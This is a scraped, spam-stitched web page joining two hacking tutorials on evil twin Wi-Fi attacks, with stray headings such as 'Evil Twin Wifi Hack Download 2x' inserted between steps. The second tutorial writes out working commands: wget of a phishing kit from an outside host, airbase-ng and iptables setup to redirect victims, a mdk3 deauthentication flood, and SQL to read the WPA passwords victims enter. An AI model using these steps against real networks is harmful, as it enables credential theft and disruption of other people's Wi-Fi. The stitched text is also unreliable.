Evil Twin Wifi Hack Download

Posted on

by hash3liZer . 18 June 2018

  1. Evil Twin Wifi Hack Download Pc
  2. Evil Twin Wifi Hack Download For Android
  3. Evil Twin Wifi Hack Download 2x

in this tutorial, i'll breifly explain how one can use Fake (Rogue) Access Point to sneak passphrases and other important target details over the air by showing targets a fabricated document. We will do hell of this task using hostapd, a well-written ad-hoc software. A Rogue (Fake) Access Point is plotted to tempt and influence users to perform involuntary tasks.
As this rogue network is nearly under the control of attacker because he is operating it, this allows him to stage several ill-natured attacks against the nodes.

If are not completely familiar with Rogue AP or it's been the first time you are reading this, this might not be for you. Before you dive deep into this, i recommend reading this one first: How to Setup Fake (Rogue) Access Point on Linux aireplay-ng

Wireless protocols are greatly enhanced since 2003 after the evolution of WPA in the reign of WiFi protected Access. A Fake Access Point is simply a wireless network possessing most of the attributes, the target network comprised of. The more it looks factual and discharge strong signal strength over a reasonable distance, the more possibility there will exist of getting that particular task done.

Evil Twin Attack’s sole purpose is to eavesdrop on WiFi users to steal personal or corporate information without user’s knowledge. We will not be using any automated script, rather we will understand the concept and perform it manually so that you can make your own script to automate the task and make it simple and usable on low-end devices.

PHISHING

Coerce or influence someone to perform unintentional tasks by showing a forged document or a falsified page is said to be the phishing way.

Wireless Adapter

A perfect wireless adapter is the foremost neccassity of a fake wireless network. A card with support of promiscious mode and packet injection is required to operate it in monitor mode and send forged packets over the area. Another important thing is to operate it at a suplemental frequency though its not compulsory if the victim is roughly close to you. The Recommended one are:

  • Alfa AWUSO36NH (Recommended, you can the change frequency)
  • TP-Link WN722N (Nice, doesn't allow to change frequency, works fine with hostapd)
  • Panda 300Mbps (Slow speed, but provides great distance. Not so best)

Is it effective?

As have already discussed, it's effictiveness depend on illegitimacy of it's structure and how it is desgined. The more it looks factual and authentic, the more coercive attack it will be.

STEP 1

Setup environment

Before, we take a head-start, this tutorial is written on the basis of Kali Rolling 2018.1 as the attacker OS while any other platform could be taken as a choice of victim.

Update the environment and install required packages

This will install hostapd and dnsmasq and will update apache2 web server.

STEP 2

Wireless Interface

Find the adapter interface and put it in monitor mode. In my case the wireless interface is wlan1 as shown in the above screenshot. So,

STEP 3

Evil Twin Wifi Hack Download Pc

Fake AP

Now, create a new folder under the home directory for the network files and navigate to that directory. For now, let's say fakeap is the directory. So,

Setup a new hostapd configuration file and write the following instructions into the file:

Press CTRL+X and then y to it. Note these three parameters in the above configuration:

  • interface: Monitor mode Wireless Interface to use.
  • ssid: Fake Access Point ESSID (name).
  • channel: Fake AP Channel to operate on.

Now, just initiate the fake access point:

MULTIPLE ACCESS POINTS [scripting] (optional)

If you have multiple targets or you are willing to write a script for multiple targets, hostapd provides this support too. You can provide multiple virtual interfaces to operate multiple networks from a single wireless card at a time. Tough it would slow down the whole process and would cause some other network problems. The standard usage of this is to host 3 networks from a single card at a time.

Make Sure to remove the comments from the configuration provided above or it will throw a syntax error.

STEP 4

DHCP

We have dnsmasq for this part. dnsmasq is a Dynamic Host Configuration Protocol (DHCP) server, with support of dns forwarder and some other network features. It certainly is fast and easier to modify. Open a new terminal and create a configuration file for dnsmasq.

Note these paramters in the above instructions.

  • dhcp-range: IP Range for network clients. 12h is the lease time.
  • dhcp-option=3: Gateway IP for the networks.
  • dhcp-option=6: DNS Server.
  • listen-address: Bind DHCP to local IP.

Assign the network Gateway and netmask to the interface and add the routing table.

Now, start dnsmasq server protocol.

STEP 4

Traffic Forwarding (Optional)

Here, we will forward traffic from one interface to another, just in case you are eager to provide your victims Internet Access. This would help you perform various other Man-in-the-middel (MITM) attacks and hence, will increase the scope of your attack. After this, it would work most likely a functional wireless access point.

Note these two parameters in the last two commands:

  • --out-interface: interface from where to forward traffic to wlan1mon, i.e eth0
  • --in-interface: Interface to which traffic is being forwarded, i.e. wlan1mon

Now, just one step to go..

STEP 5

Evil twin wifi hack download free windows 7

MySQL storage

Now, we are required a site storage to store what's posted along the headers in the form fields. In the aireplay tutorial of setting up Rogue Access Point, we used a different approach to get the credentials. In fact, we sniffed the traffic travelling between the server and client to acheive our aim. But that didn't store the password permanently. An alternative approach of that is using database. So, we will use MySQL. Open MySQL and execute the below commands blind-folded.

What exactly happened back in the previous commands in short is:

  1. A new database is created.
  2. This database is assigned a user who can write data under the influence of password.
  3. A data table is created to store the required fields.

When, the data from a user will be posted to server, whatever will be entered in those fields which we will see how in the subsequent steps, will be saved in this database table. Then after that you can check for table changes:

STEP 5

Phishing Site

Now, we are required a phishing site, a falsified page or a forged document, basically a web document to induce a user to enter his WiFi passphrase in the document fields. You better want to create your own. But for now, let just download this one:

Extract the zip file which will give you a new folder rogueap.

Remove all the current files under /var/www/html and move all rogueap files to this directory

STEP 6

Apache and MySQL

Start Apache2 and MySQL Services:

The main logic behind password storage is placed under the file dbconnect.php which is by now located under /var/www/html/ directory. Go on and open that file:

Evil twin wifi hack download software

Note, the highlighted fields in the above picture. This is where database credentials are defined. It means if you mess with database configuration, you have to alter this file too or vice virsa.

Now, just redirect the network traffic to Gateway IP where our forged document is located:

If until yet everything works, open the link 192.168.1.1 in your browser and see if the document is available. If it is, then try once entering any value in the fields and check in the database terminal if changes are commited.

STEP 7

Deauthentication

This is another compliment to this attack. We will forcely disconnect the victims from the real network, so they would connect the forged network. For this, we will create an infinite loop of deauthentication packets for the target network.

Note the paramters:

  • BD:88:E8:7D:D8:F8: MAC Address of target wireless network
  • wlan2mon: Interface from which to send disconnection packets.

The question arises here. Is it necassery to buy another wireless card to do this? No, you can use the same adapter for this part too. Just make sure that the wireless card doesn't change operating channel while dispatching packets which is by default in this case. Well, it's not always works. So, it's better to use another wireless adapter for this.

STEP 8

Let's play the victim role. When a victim after deauthentication connects to forged network, he will inevitably put himself into a situation where he will give away his password for the sake of internet usage. Well, as soon he sees our fake page and enter the passphrase in document fields, changes in database will be commited and we will get the password on fly.

So, come back to MySQL terminal and again check any changes to database:

From this we be able to know that the password is [email protected].

Conclusion

We have seen to setup a fake access point to harvest potential data over the air. At first, we launched the AP base using hostapd, then we assgined the network some IP parameters and added some routing rules for traffic settlement. Then we seen to forward Internet for enhancing the phishing process. And at the end, we setup the Phishing site via apache Web Server and MySQL storage server.

Posted by Hacking-Tutorial.com in Hacking Tutorial 4 comments

Evil Twin Wifi Hack Download For Android

Hi Hacking-tutorial.com readers, today we will learn How to create Evil Twin Access Point.

Requirements:

1. Kali Linux

2. Wireless network adapter[I em using TP-link TL-WN821N]

3. Internet connection to your machine

4. Target Access point

What is Evil twin access point??

An evil twin, in security, is a rogue wireless access point that masquerades as a Wi-Fi access point so that an attacker can gather personal information without the user's knowledge.

To the user, the evil twin looks like a hotspot with a strong signal; that's because the attacker has not only used the same network name and settings as the 'good twin' he is impersonating, he has also physically positioned himself near the end-user so that his signal is likely to be the strongest within range.

If the end-user is tempted by the strong signal and connects manually to the evil twin to access the Internet, or if the user's computer automatically chooses that connection because it is running in promiscuous mode, the evil twin becomes the user's Internet access point, giving the attacker the ability to intercept sensitive data such as passwords.

So let’s get started with the tutorial for creating an evil twin access point..

Step by step How to Create Evil Twin Access Point

Step 1:

Login to your kali linux machine..

Establish an internet connection to your host machine..

Now we have to install DHCP server as follows..

Open the terminal and type apt-get install dhcp3-server as show below:

In the above screenshot I have already installed the dhcp server..

Step 2:

Now we need to configure our DHCP server as below..

Open your terminal and type nano/etc/dhcpd.conf, you should have a blank file opened up on your terminal..

Now type the following shown on the screen shot below

After typing press ctrl+x and then press y and hit enterto save it.

Step 3:

Now download the security update page which the client will see when they open up the web browser..

To do that,

Navigate to, cd /var/www in your terminal and do as follows:

rm index.html

wget http://hackthistv.com/eviltwin.zip

unzip eviltwin.zip

rm eviltwin.zip

Step 4:

Now type the following to start your apache server and mysql:

/etc/init.d/apache2 start

/etc/init.d/mysql start

Now the mysql is loaded now we have to create a database where we store the WPA/WPA2 password that the client enters into the security update page..

Type the follows:

mysql -u root

create database evil_twin;

use evil_twin

create table wpa_keys(password varchar(64), confirm varchar(64));

In the above screenshot the databse already exists..

Leave the mysql terminal open..

Step 5:

Now we need to find our local network adapter interface name and our local ip

Now open the new terminal and type:

ip route (take note of local ip n wired interface)

airmon-ng

airmon-ng start wlan0

clear

NOTE: eth0 is my interface name and 192.168.0.105 is my local ip

airodump-ng-oui-update

airodump-ng -M mon0 (take note of target essid,bssid and channel number)

airbase-ng -e [ESSID] -c [ch. #] -P mon0

NOTE: [ESSID] is your targets ESSID and [ch. #] targets channel no.

Step 6:

Our evil twin access point is now up and running, we need to configure our tunnel interface so we can create a bridge between our evil twin access point and our wired interface and our tunnel interface is named at0, which was created when we created evil twin access point using airbase..

Don’t close airbase and mysql terminal..

Now open a new terminal and type as follows:

ifconfig at0 192.168.1.129 netmask 255.255.255.128

now we need to add a routing table to enable IP forwarding so we can forward traffic to and fro from our evil twin access point..

so,type the following:

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE

iptables –append FORWARD –in-interface at0 -j ACCEPT

Evil Twin Wifi Hack Download 2x

iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination [LOCALIP ADDRESS:80]

iptables -t nat -A POSTROUTING -j MASQUERADE

dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

etc/init.d/isc-dhcp-server start

Step 7:

Now we need to force our clients to connect to our evil twin access point and to accomplish this we need to disconnect the clients by performing the de-authentication attack. To do that first we need to create the blacklist file that contains BSSID of the target..

Do as follows :

echo [BSSID] > blacklist

NOTE:[BSSID] BSSID of the target

mdk3 mon0 d -b blacklist -c [CH.#]

Now go back to airbase terminal to check if any client has connected to your evil twin access point..

If he is connected to the evil twin access point he will see the security page as shown below which asks for password..

Where the client enters his WPA/WPA2 password and clicks on update.

Now go over to the mysql terminal and type

use evil_twin

select * from wpa_keys; {To view the password entered by the victim in our mysql database}

So that’s it, that’s how you create an evil twin access point..

This tutorial is only for educational purpose!!

Hope you found it useful

Thank you J

Article by: Kartik Durg [J-BOY]

Share this article if you found it was useful:

Hacking Tutorial, Tips and Trick

See all posts by Hacking-Tutorial.com Visit Website : https://www.hacking-tutorial.com